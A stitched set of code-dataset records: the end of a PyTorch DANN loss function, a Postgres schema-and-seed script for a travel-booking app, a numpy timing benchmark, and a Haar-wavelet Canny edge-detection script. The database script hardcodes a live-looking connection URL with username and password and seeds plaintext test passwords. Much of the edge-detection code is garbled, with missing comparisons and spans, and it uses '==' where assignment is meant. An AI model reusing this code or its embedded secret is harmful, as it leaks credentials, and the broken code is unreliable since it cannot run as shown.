keys\n 'class' : Tensor, shape = (batch_size, n_classes) logits of classes (raw, not logsoftmax)\n 'domain': Tensor, shape = (batch_size,) logprob for domain\n :param batch: dict with keys\n 'src_images':\n 'trg_images':\n 'src_classes':np.Array, shape = (batch_size,)\n 'trg_classes':np.Array, shape = (batch_size,)\n if true_class is unknown, then class should be dann_config.UNK_VALUE\n :param epoch: current number of iteration\n :param n_epochs: total number of iterations\n :return:\n loss: torch.Tensor,\n losses dict:{\n \"domain_loss_on_src\"\n \"domain_loss_on_trg\"\n \"domain_loss\"\n \"prediction_loss_on_src\"\n \"prediction_loss_on_trg\"\n \"prediction_loss\"\n }\n \"\"\"\n model_output = model.forward(torch.Tensor(batch['src_images']))\n class_logits_on_src = model_output['class']\n logprobs_target_on_src = torch.squeeze(model_output['domain']) # TODO: maybe put torch.squeeze in model?\n\n model_output = model.forward(torch.Tensor(batch['trg_images']))\n class_logits_on_trg = model_output['class']\n logprobs_target_on_trg = torch.squeeze(model_output['domain'])\n\n domain_loss_weight = calc_domain_loss_weight(epoch, n_epochs)\n prediction_loss_weight = calc_prediction_loss_weight(epoch, n_epochs)\n return _loss_DANN_splitted(\n class_logits_on_src,\n class_logits_on_trg,\n logprobs_target_on_src,\n logprobs_target_on_trg,\n true_labels_on_src=batch['src_classes'],\n true_labels_on_trg=batch['trg_classes'],\n domain_loss_weight=domain_loss_weight,\n prediction_loss_weight=prediction_loss_weight)\n","sub_path":"loss/dann_loss.py","file_name":"dann_loss.py","file_ext":"py","file_size_in_byte":6120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"34729559","text":"import os\nimport sys\n\nimport psycopg2 as dbapi2\n\nDATABASE_URL = 'postgres://kalcitdkfyeevw:39cdcacf84047dc48c74f58064a25a7406bd3645c95c712b9ba888f28cab791b@ec2-54-243-187-30.compute-1.amazonaws.com:5432/d96hqqveldfnft'\n\nINIT_STATEMENTS = [\n \"\"\"DROP TABLE IF EXISTS images cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS hotels cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS expeditions cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS tickets cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS seats cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS users cascade \"\"\",\n \"\"\"DROP TABLE IF EXISTS firms 
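# added note on calc_domain_loss_weight above: the DANN paper's schedule is
# lambda_p = 2 / (1 + exp(-gamma * p)) - 1, ramping from 0 to 1; without the
# trailing "- 1" (as written above) the weight starts at 1 and tends to 2.
# Sketch of the published form:
import numpy as np

def dann_lambda(p, gamma=10.0):
    return 2.0 / (1.0 + np.exp(-gamma * p)) - 1.0

assert dann_lambda(0.0) == 0.0 and dann_lambda(1.0) > 0.999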
cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS drivers cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS vehicles cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS city cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS sale cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS terminal cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS user_has_sale cascade\"\"\",\n \"\"\"DROP TABLE IF EXISTS images_for_firms cascade\"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS city \n (\n code VARCHAR(2) UNIQUE NOT NULL PRIMARY KEY,\n city_name VARCHAR(25) UNIQUE NOT NULL,\n population INT DEFAULT -1,\n region VARCHAR(20) DEFAULT 'MARMARA',\n altitude INT DEFAULT -1 \n\n )\"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS hotels \n (\n hotel_id SERIAL NOT NULL PRIMARY KEY,\n name VARCHAR (25) NOT NULL,\n email VARCHAR (50) NOT NULL,\n description VARCHAR (250) NOT NULL,\n city VARCHAR(2),\n address VARCHAR (250) NOT NULL,\n phone VARCHAR (15) NOT NULL,\n website VARCHAR (50),\n logo BYTEA,\n FOREIGN KEY (city) REFERENCES city (code) ON DELETE RESTRICT ON UPDATE CASCADE\n\n )\"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS images(\n hotel_id INT NOT NULL,\n image_id SERIAL NOT NULL,\n file_data BYTEA,\n PRIMARY KEY (hotel_id, image_id),\n FOREIGN KEY (hotel_id) REFERENCES hotels (hotel_id) ON DELETE CASCADE ON UPDATE CASCADE ,\n UNIQUE (hotel_id, image_id)\n )\n \"\"\",\n\n\n \"\"\"CREATE TABLE IF NOT EXISTS users \n (\n user_id SERIAL NOT NULL PRIMARY KEY,\n user_name VARCHAR(15) UNIQUE NOT NULL,\n email VARCHAR (50) NOT NULL,\n password VARCHAR (50) NOT NULL,\n name VARCHAR (50) NOT NULL,\n surname VARCHAR (50) NOT NULL,\n phone VARCHAR (15) NOT NULL,\n gender VARCHAR (1) NOT NULL,\n address VARCHAR (250) NOT NULL,\n last_login TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,\n register_time TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,\n is_admin BOOLEAN NOT NULL DEFAULT FALSE\n\n )\"\"\",\n\n\n \"\"\"CREATE TABLE IF NOT EXISTS terminal \n (\n terminal_id SERIAL NOT NULL PRIMARY KEY,\n terminal_name VARCHAR(50) UNIQUE NOT NULL,\n terminal_code VARCHAR(6) UNIQUE NOT NULL,\n email VARCHAR (50) NOT NULL,\n phone VARCHAR (15) NOT NULL,\n address VARCHAR (250) NOT NULL,\n description VARCHAR (60) NOT NULL,\n city_id VARCHAR (2),\n FOREIGN KEY (city_id) REFERENCES city (code) ON DELETE CASCADE ON UPDATE CASCADE\n\n )\"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS firms \n (\n firm_id SERIAL NOT NULL PRIMARY KEY,\n name VARCHAR (20) NOT NULL,\n password VARCHAR (50) NOT NULL,\n email VARCHAR (20) NOT NULL,\n phone VARCHAR (20) NOT NULL,\n city VARCHAR (2),\n address VARCHAR (100),\n website VARCHAR (20),\n description VARCHAR (200),\n logo BYTEA,\n FOREIGN KEY (city) REFERENCES city (code) ON DELETE RESTRICT ON UPDATE CASCADE\n \n )\"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS images_for_firms(\n firm_id INT,\n image_id SERIAL NOT NULL,\n file_data BYTEA,\n PRIMARY KEY (firm_id, image_id),\n FOREIGN KEY (firm_id) REFERENCES firms (firm_id) ON DELETE CASCADE ON UPDATE CASCADE ,\n UNIQUE (firm_id, image_id)\n )\n \"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS drivers \n (\n driver_id SERIAL NOT NULL PRIMARY KEY,\n name VARCHAR (20) NOT NULL,\n email VARCHAR (20) NOT NULL,\n gender VARCHAR (20),\n city VARCHAR (2),\n address VARCHAR (200),\n phone VARCHAR (20) NOT NULL,\n firm_id INT,\n FOREIGN KEY (city) REFERENCES city (code) ON DELETE CASCADE ON UPDATE CASCADE,\n FOREIGN KEY (firm_id) REFERENCES firms (firm_id) ON DELETE CASCADE ON UPDATE CASCADE\n )\"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS vehicles \n (\n vehicle_id SERIAL NOT NULL PRIMARY KEY,\n name VARCHAR 
(20) NOT NULL,\n category VARCHAR (20) NOT NULL,\n model VARCHAR (20) NOT NULL,\n capacity INT NOT NULL,\n production_year INT NOT NULL,\n production_place VARCHAR (20) NOT NULL,\n description VARCHAR (200),\n document BYTEA,\n firm_id INT,\n FOREIGN KEY (firm_id) REFERENCES firms (firm_id)\n \n )\"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS expeditions \n (\n expedition_id SERIAL NOT NULL PRIMARY KEY,\n from_city VARCHAR (02) NOT NULL,\n from_ter INT NOT NULL,\n to_city VARCHAR (02) NOT NULL,\n to_ter INT NOT NULL,\n dep_time VARCHAR (5) NOT NULL ,\n arr_time VARCHAR (5) NOT NULL ,\n date VARCHAR (10) NOT NULL ,\n price INT NOT NULL CHECK (price >= 10),\n plane_id INT NOT NULL ,\n current_cap INT NOT NULL DEFAULT 0,\n total_cap INT NOT NULL,\n driver_id INT NOT NULL,\n firm_id INT NOT NULL,\n document BYTEA,\n FOREIGN KEY (from_city) REFERENCES city (code) ON DELETE RESTRICT ON UPDATE CASCADE,\n FOREIGN KEY (to_city) REFERENCES city (code) ON DELETE RESTRICT ON UPDATE CASCADE,\n FOREIGN KEY (from_ter) REFERENCES terminal (terminal_id) ON DELETE RESTRICT ON UPDATE CASCADE,\n FOREIGN KEY (to_ter) REFERENCES terminal (terminal_id) ON DELETE RESTRICT ON UPDATE CASCADE,\n FOREIGN KEY (plane_id) REFERENCES vehicles (vehicle_id) ON DELETE RESTRICT ON UPDATE CASCADE,\n FOREIGN KEY (driver_id) REFERENCES drivers (driver_id) ON DELETE RESTRICT ON UPDATE CASCADE,\n FOREIGN KEY (firm_id) REFERENCES firms (firm_id) ON DELETE RESTRICT ON UPDATE CASCADE\n \n\n )\"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS seats(\n expedition_id INT NOT NULL,\n user_id INT NOT NULL,\n seat_number INT NOT NULL,\n PRIMARY KEY (expedition_id, user_id, seat_number),\n FOREIGN KEY (expedition_id) REFERENCES expeditions (expedition_id) ON DELETE RESTRICT ON UPDATE CASCADE ,\n FOREIGN KEY (user_id) REFERENCES users (user_id) ON DELETE CASCADE ON UPDATE CASCADE ,\n UNIQUE (expedition_id, user_id, seat_number)\n )\n \"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS tickets(\n expedition_id INT NOT NULL,\n user_id INT NOT NULL,\n seat_number INT NOT NULL,\n ticket_id SERIAL NOT NULL,\n bought_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,\n edited_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,\n is_cancelable BOOLEAN DEFAULT FALSE,\n extra_baggage BOOLEAN DEFAULT FALSE,\n price INT NOT NULL,\n firm_id INT NOT NULL,\n UNIQUE (expedition_id, user_id, seat_number),\n PRIMARY KEY (ticket_id),\n FOREIGN KEY (expedition_id, user_id, seat_number) REFERENCES seats (expedition_id, user_id, seat_number) ON DELETE RESTRICT ON UPDATE CASCADE,\n FOREIGN KEY (firm_id) REFERENCES firms (firm_id) ON DELETE RESTRICT ON UPDATE CASCADE \n )\n \"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS sale(\n sale_id SERIAL NOT NULL PRIMARY KEY,\n sale_code VARCHAR(6) UNIQUE NOT NULL,\n sale_start_at DATE NOT NULL,\n sale_finish_at DATE NOT NULL,\n sale_description VARCHAR (60) NOT NULL,\n is_active BOOLEAN NOT NULL,\n firm_id INT NOT NULL,\n sale_price INT NOT NULL,\n FOREIGN KEY (firm_id) REFERENCES firms (firm_id) ON DELETE CASCADE ON UPDATE CASCADE\n )\"\"\",\n\n \"\"\"CREATE TABLE IF NOT EXISTS user_has_sale(\n sale_id INT NOT NULL,\n user_id INT NOT NULL,\n is_used BOOLEAN NOT NULL,\n PRIMARY KEY (sale_id, user_id),\n FOREIGN KEY (user_id) REFERENCES users (user_id) ON DELETE CASCADE ON UPDATE CASCADE,\n FOREIGN KEY (sale_id) REFERENCES sale (sale_id) ON DELETE CASCADE ON UPDATE CASCADE\n )\"\"\",\n\n \"\"\"INSERT INTO city VALUES \n ('01', 'Adana'),\n ('02', 'Adıyaman'),\n ('03', 'Afyon'),\n ('04', 'Ağrı'),\n ('05', 'Amasya'),\n ('06', 'Ankara'),\n ('07', 'Antalya'),\n ('08', 
'Artvin'),\n ('09', 'Aydın'),\n ('10', 'Balıkesir'),\n ('11', 'Bilecik'),\n ('12', 'Bingöl'),\n ('13', 'Bitlis'),\n ('14', 'Bolu'),\n ('15', 'Burdur'),\n ('16', 'Bursa'),\n ('17', 'Çanakkale'),\n ('18', 'Çankırı'),\n ('19', 'Çorum'),\n ('20', 'Denizli'),\n ('21', 'Diyarbakır'),\n ('22', 'Edirne'),\n ('23', 'Elazığ'),\n ('24', 'Erzincan'),\n ('25', 'Erzurum'),\n ('26', 'Eskişehir'),\n ('27', 'Gaziantep'),\n ('28', 'Giresun'),\n ('29', 'Gümüşhane'),\n ('30', 'Hakkari'),\n ('31', 'Hatay'),\n ('32', 'Isparta'),\n ('33', 'Mersin'),\n ('34', 'İstanbul'),\n ('35', 'İzmir'),\n ('36', 'Kars'),\n ('37', 'Kastamonu'),\n ('38', 'Kayseri'),\n ('39', 'Kırklareli'),\n ('40', 'Kırşehir'),\n ('41', 'Kocaeli'),\n ('42', 'Konya'),\n ('43', 'Kütahya'),\n ('44', 'Malatya'),\n ('45', 'Manisa'),\n ('46', 'K.Maraş'),\n ('47', 'Mardin'),\n ('48', 'Muğla'),\n ('49', 'Muş'),\n ('50', 'Nevşehir'),\n ('51', 'Niğde'),\n ('52', 'Ordu'),\n ('53', 'Rize'),\n ('54', 'Sakarya'),\n ('55', 'Samsun'),\n ('56', 'Siirt'),\n ('57', 'Sinop'),\n ('58', 'Sivas'),\n ('59', 'Tekirdağ'),\n ('60', 'Tokat'),\n ('61', 'Trabzon'),\n ('62', 'Tunceli'),\n ('63', 'Şanlıurfa'),\n ('64', 'Uşak'),\n ('65', 'Van'),\n ('66', 'Yozgat'),\n ('67', 'Zonguldak'),\n ('68', 'Aksaray'),\n ('69', 'Bayburt'),\n ('70', 'Karaman'),\n ('71', 'Kırıkkale'),\n ('72', 'Batman'),\n ('73', 'Şırnak'),\n ('74', 'Bartın'),\n ('75', 'Ardahan'),\n ('76', 'Iğdır'),\n ('77', 'Yalova'),\n ('78', 'Karabük'),\n ('79', 'Kilis'),\n ('80', 'Osmaniye'),\n ('81', 'Düzce')\n \n \"\"\",\n\n \"\"\"INSERT INTO terminal VALUES(5,'3de3m2','3d112','3email','3phone2','addres2s','descrip2tion','01')\"\"\",\n\n \"\"\"INSERT INTO terminal VALUES(6,'3devm2','3d1n12', '3emadil', '3phodne2','addres2s','descrip2tion', '01')\"\"\",\n\n \"\"\" INSERT INTO firms\n (firm_id, name, \"password\", email, phone, city, address, website, description, logo)\n VALUES(100, 'deneme', 'deneme', 'deneme@deneme.com', '23452345', '10', NULL, NULL, NULL, NULL);\n \"\"\",\n\n \"\"\" INSERT INTO firms\n (firm_id, name, \"password\", email, phone, city, address, website, description, logo)\n VALUES(101, 'deneme1', 'deneme1', 'deneme1@deneme.com', '234523245', '10', NULL, NULL, NULL, NULL);\n \"\"\",\n\n \"\"\" INSERT INTO firms\n (firm_id, name, \"password\", email, phone, city, address, website, description, logo)\n VALUES(102, 'deneme2', 'deneme2', 'deneme2@deneme.com', '234523245', '10', NULL, NULL, NULL, NULL);\n \"\"\",\n\n \"\"\" INSERT INTO drivers \n (driver_id, name, email, gender, city, address, phone, firm_id)\n VALUES(100, 'driver1', 'driver1', 'kadin','10', 'address', '123123',100);\n \"\"\",\n\n \"\"\" INSERT INTO drivers \n (driver_id, name, email, gender, city, address, phone, firm_id)\n VALUES(101, 'driver2', 'driver2', 'erkek','10', 'address', '123123',100);\n \"\"\",\n\n \"\"\" INSERT INTO drivers \n (driver_id, name, email, gender, city, address, phone, firm_id)\n VALUES(102, 'driver3', 'driver3', 'kadin','10', 'address', '123123',101);\n \"\"\",\n\n \"\"\"INSERT INTO vehicles\n (vehicle_id, name, category, model, capacity, production_year, production_place, description, firm_id)\n VALUES(100, 'rasit', 'ucak', '23423', 100, '1930', 'istabul', 'guzel', 100);\n\"\"\",\n\n \"\"\"INSERT INTO vehicles\n (vehicle_id, name, category, model, capacity, production_year, production_place, description, firm_id)\n VALUES(101, 'Safiye Soyman', 'yuruyen', 'X2342SD', 50, '1920', 'istabul', 'guzel', 102);\n\"\"\",\n\n \"\"\"INSERT INTO users VALUES (\n 100,\n 'admin',\n 'admin@admin.com',\n 
'81ba6f6fb506d7459c0160c52004f352',\n 'admin',\n 'admin',\n '0321221222',\n '1',\n 'deneme sokak deneme cadde deneme',\n '2017-08-02 12:10:11.123456',\n '2017-08-02 12:10:11.123456',\n 'true'\n \n )\"\"\",\n \"\"\"INSERT INTO users VALUES (\n 101,\n 'user',\n 'user@user.com',\n 'user',\n 'user',\n 'user',\n '0321221222',\n '1',\n 'deneme sokak deneme cadde deneme',\n '2017-08-02 12:10:11.123456',\n '2017-08-02 12:10:11.123456',\n 'false'\n \n )\"\"\"\n\n]\n\n\ndef initialize(url):\n with dbapi2.connect(url) as connection:\n cursor = connection.cursor()\n for statement in INIT_STATEMENTS:\n cursor.execute(statement)\n cursor.close()\n\n\nif __name__ == \"__main__\":\n url = os.getenv(\"DATABASE_URL\")\n if url is None:\n print(\"Usage: DATABASE_URL=url python dbinit.py\", file=sys.stderr)\n sys.exit(1)\n initialize(url)\n","sub_path":"dbinit.py","file_name":"dbinit.py","file_ext":"py","file_size_in_byte":15607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"590265225","text":"\"\"\"\nA series of tests to examing the performance difference between two systems\n\"\"\"\n\ndef sum(lst = [1e3,1e4,1e5,1e6]):\n from time import time\n import timeit\n import numpy as np\n mean = []\n std = []\n size = []\n for length in lst:\n preparation= ''\n preparation += \"import numpy as np \\n\"\n preparation += f\"arr = np.random.rand({int(length)}) \\n\"\n testcode = 'ttttt = arr.sum()'\n t = timeit.Timer(testcode,preparation)\n result = np.array(t.repeat(4,20))/20\n mean.append(round(result.mean(),4))\n std.append(round(result.std(),4))\n size.append(length)\n return np.array(mean), np.array(std), np.array(size)\n","sub_path":"lcp_video/benchmarks/linuxbox_performance.py","file_name":"linuxbox_performance.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"641047292","text":"# -*- coding: utf-8 -*-\nimport numpy as np;\n#from numpy import insert;\nimport cv2;\nimport scipy;\nfrom scipy import misc;\nfrom scipy.misc import imread; \n\n#imag=scipy.misc.imread('F:\\program file\\canopy\\Home_Work\\lena_gray.png',1);\n\nimport numpy as np;\n#from numpy import insert;\nimport cv2;\nimport scipy;\nfrom scipy import misc;\nfrom scipy.misc import imread; \nimport random;\n\nimag_origin=cv2.imread('F:\\program file\\canopy\\Project\\carriage.jpg',0);\n[row,col]=imag_origin.shape;\n#im=np.zeros(shape=(row,col),dtype=np.uint8);\n#noise2=np.zeros(shape=(row,col),dtype=np.uint8);\n#cv2.randn(noise2,(0),(20));\n#print noise2;\nimag=np.zeros(shape=(row,col));\n\n\n############\n##Important Declaration: this salt pepper noise function is from open source library:http://www.scriptscoop.net;\ndef impulse_noise(image,prob):\n\n fina_imag = np.zeros(image.shape,np.uint8)\n thre = 1 - prob \n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n rand = random.random()\n if rand < prob:\n fina_imag[i][j] = 240\n elif rand > thre:\n fina_imag[i][j] = 255\n else:\n fina_imag[i][j] = image[i][j]\n return fina_imag;\n\n##############\n\n\n\nimag = impulse_noise(imag_origin,0.02);\ncv2.imwrite('ca_image_noise2.png', 
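# added standalone sketch of the benchmark record above: timeit.Timer(stmt,
# setup).repeat(repeat, number) returns total seconds per run of `number`
# executions, so per-call time is the total divided by number:
import timeit

setup = 'import numpy as np\narr = np.random.rand(100000)'
per_call = min(timeit.Timer('arr.sum()', setup).repeat(3, 20)) / 20
assert per_call > 0.0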
imag);\n\n\n\n[row,col]=imag.shape;\nrow2=int(row*0.5);\ncol2=int(col*0.5);\nrow3=int(row2*0.5);\ncol3=int(col2*0.5);\nrow4=int(row3*0.5);\ncol4=int(col3*0.5);\nrow5=int(row4*0.5);\ncol5=int(col4*0.5);\nrow6=int(row5*0.5);\ncol6=int(col5*0.5);\n\nimag_haar1=np.zeros(shape=(row,col));\nhaar_front1=np.zeros(shape=(row,row));\nhaar_back1=np.zeros(shape=(col,col));\nhaar_front2=np.zeros(shape=(row2,row2));\nhaar_back2=np.zeros(shape=(col2,col2));\nhaar_front3=np.zeros(shape=(row3,row3));\nhaar_back3=np.zeros(shape=(col3,col3));\nhaar_front4=np.zeros(shape=(row4,row4));\nhaar_back4=np.zeros(shape=(col4,col4));\n\ngrad_x1=np.zeros(shape=(row2,col2));\ngrad_y1=np.zeros(shape=(row2,col2));\ngrad_x2=np.zeros(shape=(row3,col3));\ngrad_y2=np.zeros(shape=(row3,col3));\ngrad_x3=np.zeros(shape=(row4,col4));\ngrad_y3=np.zeros(shape=(row4,col4));\n\n\ngrad_x1_rs=np.zeros(shape=(row,col));\ngrad_y1_rs=np.zeros(shape=(row,col));\ngrad_x2_rs=np.zeros(shape=(row2,col2));\ngrad_y2_rs=np.zeros(shape=(row2,col2));\ngrad_x3_rs=np.zeros(shape=(row3,col3));\ngrad_y3_rs=np.zeros(shape=(row3,col3));\n\ndef canny_thre(edge_image,row,col,thre1,thre2):\n \n# for i in range(0,row):\n # for j in range(0,col):\n # if edge_image[i][j]thre2:\n mark[i][j]=1;\n elif edge_image.item((i,j))>thre1:\n mark[i][j]=2;\n elif edge_image.item((i,j))thre2:\n mark[i][j]=1;\n elif edge_image.item((i,j))>thre1:\n mark[i][j]=2;\n elif edge_image.item((i,j))-0.414:\n mark[i+1][j]==2;\n change_sign=1;\n if mark[i-1][j]==1 and tang<0.414 and tang>-0.414:\n mark[i-1][j]==2;\n change_sign=1;\n if mark[i-1][j+1]==1 and tang<-0.414 and tang>-2.414:\n mark[i-1][j+1]==2;\n change_sign=1;\n if mark[i+1][j-1]==1 and tang<-0.414 and tang>-2.414:\n mark[i+1][j-1]==2;\n change_sign=1;\n if (mark[i+1][j]==1 and tang>2.414) or (mark[i+1][j]==1 and tang<-2.414):\n mark[i+1][j]==2;\n change_sign=1;\n if (mark[i-1][j]==1 and tang>2.414) or (mark[i-1][j]==1 and tang<-2.414):\n mark[i-1][j]==2;\n change_sign=1;\n if mark[i-1][j-1]==1 and tang>0.414 and tang<2.414:\n mark[i-1][j-1]==2;\n change_sign=1;\n if mark[i+1][j+1]==1 and tang>0.414 and tang<2.414:\n mark[i+1][j+1]==2;\n change_sign=1;\n \n \n \n new_edge=np.zeros(shape=(row,col)); \n for i in range(0,row):\n for j in range(0,col):\n if mark[i][j]==2:\n new_edge[i][j]=0;\n else:\n new_edge[i][j]=255;\n \n \n return new_edge;\n\n\n\n\ndef canny_thre_grad_test(edge_image,grad_x,grad_y,row,col,thre1,thre2):\n \n# for i in range(0,row):\n # for j in range(0,col):\n # if edge_image[i][j]thre2:\n mark[i][j]=1;\n elif edge_image.item((i,j))>thre1:\n mark[i][j]=2;\n elif edge_image.item((i,j))-0.414:\n mark[i][j+1]==2;\n change_sign=1;\n if mark[i][j-1]==1 and tang<0.414 and tang>-0.414:\n mark[i][j-1]==2;\n change_sign=1;\n if mark[i-1][j+1]==1 and tang<-0.414 and tang>-2.414:\n mark[i-1][j+1]==2;\n change_sign=1;\n if mark[i+1][j-1]==1 and tang<-0.414 and tang>-2.414:\n mark[i+1][j-1]==2;\n change_sign=1;\n if (mark[i+1][j]==1 and tang>2.414) or (mark[i+1][j]==1 and tang<-2.414):\n mark[i+1][j]==2;\n change_sign=1;\n if (mark[i-1][j]==1 and tang>2.414) or (mark[i-1][j]==1 and tang<-2.414):\n mark[i-1][j]==2;\n change_sign=1;\n if mark[i-1][j-1]==1 and tang>0.414 and tang<2.414:\n mark[i-1][j-1]==2;\n change_sign=1;\n if mark[i+1][j+1]==1 and tang>0.414 and tang<2.414:\n mark[i+1][j+1]==2;\n change_sign=1;\n \n \n \n new_edge=np.zeros(shape=(row,col)); \n for i in range(0,row):\n for j in range(0,col):\n if mark[i][j]==2:\n new_edge[i][j]=0;\n else:\n new_edge[i][j]=255;\n \n \n return 
new_edge;\n\n\n\n\n\n\n\n\n \ndef norm_thre(edge_image,row,col,thre):\n \n new_edge=np.zeros(shape=(row,col));\n for i in range(0,row):\n for j in range(0,col):\n if edge_image.item((i,j))-0.414:\n if Max(edge_imag,i,j,1)!=1:\n result[i][j]=0;\n if tang<-0.414 and tang>-2.414:\n if Max(edge_imag,i,j,2)!=1:\n result[i][j]=0;\n if (tang>2.414) or (tang<-2.414):\n if Max(edge_imag,i,j,3)!=1:\n result[i][j]=0;\n if (tang>0.414) and (tang<2.414):\n if Max(edge_imag,i,j,4)!=1:\n result[i][j]=0;\n \n \n return result;\n\n \ndef Max(edge_imag,i,j,k):\n sign=0;\n if k==1:\n if edge_imag.item((i,j))>edge_imag.item((i+1,j)) and edge_imag.item((i,j))>edge_imag.item((i-1,j)):\n sign=1;\n if k==2:\n if edge_imag.item((i,j))>edge_imag.item((i+1,j+1)) and edge_imag.item((i,j))>edge_imag.item((i-1,j-1)):\n sign=1;\n if k==3:\n if edge_imag.item((i,j))>edge_imag.item((i,j+1)) and edge_imag.item((i,j))>edge_imag.item((i,j-1)):\n sign=1;\n if k==4:\n if edge_imag.item((i,j))>edge_imag.item((i-1,j+1)) and edge_imag.item((i,j))>edge_imag.item((i+1,j-1)):\n sign=1;\n \n return sign;\n\n\n\n\n\n\n\n\n##########################################\n#first scale\n\nfor i in range(0,row):\n for j in range(0,row):\n if i=row2 and j==2*(i-row2): \n haar_front1[i][j]=-0.5;\n elif i>=row2 and j==2*(i-row2)+1:\n haar_front1[i][j]=0.5;\n\n\nfor i in range(0,col):\n for j in range(0,col):\n if i=col2 and j==2*(i-col2): \n haar_back1[i][j]=-0.5;\n elif i>=col2 and j==2*(i-col2)+1:\n haar_back1[i][j]=0.5;\n\nhaar_back1=haar_back1.transpose();\n\nhaar_front1=np.mat(haar_front1);\nhaar_back1=np.mat(haar_back1);\n\nimag_haar1=haar_front1*imag*haar_back1;\n\n\n\n\n\n\nimag_haar_abs1=np.zeros(shape=(row,col));\nfor i in range(0,row):\n for j in range(0,col):\n Num=abs(imag_haar1.item((i,j)));\n imag_haar_abs1[i][j]=Num;\n\n\n\nfor i in range(0,row):\n for j in range(0,col):\n if i>=row2 and j=col2:\n grad_y1[i][j-col2]=imag_haar1.item((i,j));\n\n\n\ngrad_x1_rs=cv2.resize(grad_x1,(row,col));\ngrad_y1_rs=cv2.resize(grad_y1,(row,col));\n\n\n\n\n\n\ncv2.imwrite('ca_haar1.png',imag_haar_abs1);\n\n\n\n#imag_haar_edge1=np.zeros(shape=(row,col));\n#for i in range(0,row):\n # for j in range(0,col):\n # if i=row3 and j==2*(i-row3): \n haar_front2[i][j]=-0.5;\n elif i>=row3 and j==2*(i-row3)+1:\n haar_front2[i][j]=0.5;\n \n\n\nfor i in range(0,col2):\n for j in range(0,col2):\n if i=col3 and j==2*(i-col3): \n haar_back2[i][j]=-0.5;\n elif i>=col3 and j==2*(i-col3)+1:\n haar_back2[i][j]=0.5;\n\n\nhaar_back2=haar_back2.transpose();\n\nhaar_front2=np.mat(haar_front2);\nhaar_back2=np.mat(haar_back2);\n\nimag_haar2=haar_front2*imag2*haar_back2;\nimag_haar_abs2=np.zeros(shape=(row2,col2));\n\nfor i in range(0,row2):\n for j in range(0,col2):\n Num=abs(imag_haar2.item((i,j)));\n imag_haar_abs2[i][j]=Num;\n\ncv2.imwrite('ca_haar2.png',imag_haar_abs2);\n\n\n\nfor i in range(0,row2):\n for j in range(0,col2):\n if i>=row3 and j=col3:\n grad_y2[i][j-col3]=imag_haar2.item((i,j));\n\n\n\n\ngrad_x2_rs=cv2.resize(grad_x2,(row2,col2));\ngrad_y2_rs=cv2.resize(grad_y2,(row2,col2));\n\n\n\n\n\nimag_haar_resize2=np.zeros(shape=(row,col));\nimag_haar_resize2=cv2.resize(imag_haar_abs2,(row,col));\n\n\nimag_haar_mult1=np.zeros(shape=(row,col));\nfor i in range(0,row):\n for j in range(0,col):\n Num=(imag_haar_abs1.item((i,j))*imag_haar_resize2.item((i,j)))**(0.5);\n imag_haar_mult1[i][j]=Num;\n\ncv2.imwrite('ca_haar_mult1.png',imag_haar_mult1);\n\nimag_mult_edge1=np.zeros(shape=(row,col));\nfor i in range(0,row):\n for j in range(0,col):\n if i=row4 and 
j==2*(i-row4): \n haar_front3[i][j]=-0.5;\n elif i>=row4 and j==2*(i-row4)+1:\n haar_front3[i][j]=0.5;\n \n\nfor i in range(0,col3):\n for j in range(0,col3):\n if i=col4 and j==2*(i-col4): \n haar_back3[i][j]=-0.5;\n elif i>=col4 and j==2*(i-col4)+1:\n haar_back3[i][j]=0.5;\n\n\nhaar_back3=haar_back3.transpose();\n\nhaar_front3=np.mat(haar_front3);\nhaar_back3=np.mat(haar_back3);\n\nimag_haar3=haar_front3*imag3*haar_back3;\nimag_haar_abs3=np.zeros(shape=(row3,col3));\n\nfor i in range(0,row3):\n for j in range(0,col3):\n Num=abs(imag_haar3.item((i,j)));\n imag_haar_abs3[i][j]=Num;\n\n\n\ncv2.imwrite('ca_haar3.png',imag_haar_abs3);\n\n\nfor i in range(0,row3):\n for j in range(0,col3):\n if i>=row4 and j=col4:\n grad_y3[i][j-col4]=imag_haar3.item((i,j));\n\n\ngrad_x3_rs=cv2.resize(grad_x3,(row3,col3));\ngrad_y3_rs=cv2.resize(grad_y3,(row3,col3));\n\n\nimag_haar_resize3=np.zeros(shape=(row2,col2));\nimag_haar_resize3=cv2.resize(imag_haar_abs3,(row2,col2));\n\n\n\nimag_haar_mult2=np.zeros(shape=(row2,col2));\nfor i in range(0,row2):\n for j in range(0,col2):\n Num=(imag_haar_abs2.item((i,j))*imag_haar_resize3.item((i,j)))**(0.5);\n imag_haar_mult2[i][j]=Num;\n\ncv2.imwrite('ca_haar_mult2.png',imag_haar_mult2);\n\n\n\n\nimag_mult_edge2=np.zeros(shape=(row2,col2));\nfor i in range(0,row2):\n for j in range(0,col2):\n if i=row5 and j==2*(i-row5): \n haar_front4[i][j]=-0.5;\n elif 